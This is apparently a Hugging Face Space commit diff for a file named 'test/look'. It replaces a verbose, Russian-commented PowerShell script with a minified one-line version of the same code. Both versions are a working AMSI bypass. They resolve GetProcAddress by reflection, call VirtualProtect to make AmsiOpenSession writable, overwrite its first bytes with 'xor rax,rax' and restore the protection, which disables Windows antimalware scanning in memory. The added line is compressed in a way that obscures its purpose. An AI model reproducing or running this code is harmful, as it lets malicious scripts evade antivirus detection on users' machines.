Spaces:

enotkrutoy
/

gggg

Runtime error

App Files Files Community

enotkrutoy commited on 29 days ago

Commit

e715f07

verified ·

1 Parent(s): 84e71cd

Update test/look

Browse files

Files changed (1) hide show

test/look +1 -61

test/look CHANGED Viewed

@@ -1,61 +1 @@
-function f {
-    Param($a, $b)
-    Write-Host "[f] Начало выполнения функции" -ForegroundColor Green
-    Write-Host "[f] Параметры: ModuleName=$a, FunctionName=$b" -ForegroundColor Cyan
-    $c = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -and $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
-    Write-Host "[f] Получена сборка: $($c.Assembly.FullName)" -ForegroundColor Green
-    $d = @()
-    $c.GetMethods() | ForEach-Object {
-        if ($_.Name -eq 'GetProcAddress') {
-            $d += $_
-            Write-Host "[f] Найден метод GetProcAddress" -ForegroundColor Green
-        }
-    }
-    Write-Host "[f] Возврат результата" -ForegroundColor Green
-    return $d[0].Invoke($null, @( ($c.GetMethod('GetModuleHandle')).Invoke($null, @($a)), $b ))
-}
-function g {
-    Param(
-        [Parameter(Position=0, Mandatory=$true)]
-        [Type[]]$p,
-        [Parameter(Position=1)]
-        [Type]$q = [Void]
-    )
-    Write-Host "[g] Начало выполнения функции" -ForegroundColor Green
-    Write-Host "[g] Параметры: Func=$p, DelType=$q" -ForegroundColor Cyan
-    $r = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
-        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType',
-        'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-    Write-Host "[g] Создан тип делегата: $r" -ForegroundColor Green
-    $r.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $p).SetImplementationFlags('Runtime, Managed')
-    $r.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $q, $p).SetImplementationFlags('Runtime, Managed')
-    Write-Host "[g] Возврат созданного типа" -ForegroundColor Green
-    return $r.CreateType()
-}
-Write-Host "[Main] Начало выполнения основного кода" -ForegroundColor Yellow
-# Вызов функции для получения адреса AmsiOpenSession
-[IntPtr]$s = f 'amsi.dll' 'AmsiOpenSession'
-Write-Host "[Main] Получен адрес AmsiOpenSession: $s" -ForegroundColor Green
-$o = 0
-# Создание делегата для VirtualProtect с передачей массива типов
-$v = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
-    (f 'kernel32.dll' 'VirtualProtect'),
-    (g @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))
-)
-Write-Host "[Main] Создан делегат для VirtualProtect" -ForegroundColor Green
-$v.Invoke($s, 3, 0x40, [ref]$o)
-Write-Host "[Main] Изменены права доступа к памяти" -ForegroundColor Green
-$b = [Byte[]](0x48, 0x31, 0xC0)
-[System.Runtime.InteropServices.Marshal]::Copy($b, 0, $s, 3)
-Write-Host "[Main] Записаны байты в память" -ForegroundColor Green
-$v.Invoke($s, 3, 0x20, [ref]$o)
-Write-Host "[Main] Восстановлены оригинальные права доступа" -ForegroundColor Green
-Write-Host "[Main] Завершение выполнения" -ForegroundColor Yellow


1	+ function f{param($a,$b)$c=([AppDomain]::CurrentDomain.GetAssemblies()\|where{$_.GlobalAssemblyCache -and $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods');$d=@();$c.GetMethods()\|%{if($_.Name-eq'GetProcAddress'){$d+=$_}};return $d[0].Invoke($null,@(($c.GetMethod('GetModuleHandle')).Invoke($null,@($a)),$b))} function g{param([Type[]]$a,[Type]$b=[Void])$c=[AppDomain]::CurrentDomain.DefineDynamicAssembly((new-object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule',$false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate]);$c.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard,$a).SetImplementationFlags('Runtime, Managed');$c.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual',$b,$a).SetImplementationFlags('Runtime, Managed');return $c.CreateType()} [IntPtr]$x=f 'amsi.dll' 'AmsiOpenSession';$y=0;$z=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((f 'kernel32.dll' 'VirtualProtect'),(g @([IntPtr],[UInt32],[UInt32],[UInt32].MakeByRefType())([Bool])));$z.Invoke($x,3,0x40,[ref]$y);$w=[Byte[]](0x48,0x31,0xC0);[System.Runtime.InteropServices.Marshal]::Copy($w,0,$x,3);$z.Invoke($x,3,0x20,[ref]$y)